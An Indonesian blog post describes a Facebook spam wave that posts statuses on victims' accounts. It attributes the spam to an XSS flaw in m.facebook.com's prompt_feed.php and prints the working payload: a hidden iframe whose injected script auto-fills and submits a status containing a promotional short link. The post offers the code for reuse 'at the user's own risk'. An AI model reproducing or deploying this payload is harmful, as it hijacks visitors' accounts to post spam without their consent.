Aku sering memperhatikan banyak teman2 di facebook yang entah dapet ide darimana tau2 bikin status yang aneh2 dan terkadang tanpa makna yang jelas ….. belakangan baru aku sadar kalo mereka terkena Spam Facebook. Semenjak tahu Facebook ada spamnya aku juga agak berhati2 sampai hari ini …. aku akhirnya kena spam juga, asem. Karena penasaran akhirnya cari2 tau, buka source webnya dan iseng2 aku Googling ….. akhirnya ketemu juga dia yang mengaku si pembuat kode tersebut.

Dan anehnya menurut si pembuat, script ini hanya berlaku untuk IP Indonesia dan dengan interval tertentu ….. i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval.

Dari penjelasannya, dia mengaku memanfaatkan celah yang terdapat di m.facebook.com …. dia siy menyebutnya dengan ” XSS vulnerability of prompt_feed.php “. Ok, apapun itu yang jelas ada celah buat spamming via Facebook yang bisa dengan tiba2 membuat status pada target yang telah membuka website yang telah disisipi script Spam tersebut. Sebagai bahan pengaya aku tampilkan kodenya ….. iseng aku ganti yang perlu2 saja

<iframe id="bodi" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Jangan ngaku keren kalau belum buka http://goo.gl/Aa0ww .....';document.forms[0].submit();}</script>"></iframe>

resiko atas penggunaan script diatas ditanggung oleh masing2 pemakai ….. aku disini hanya share informasi.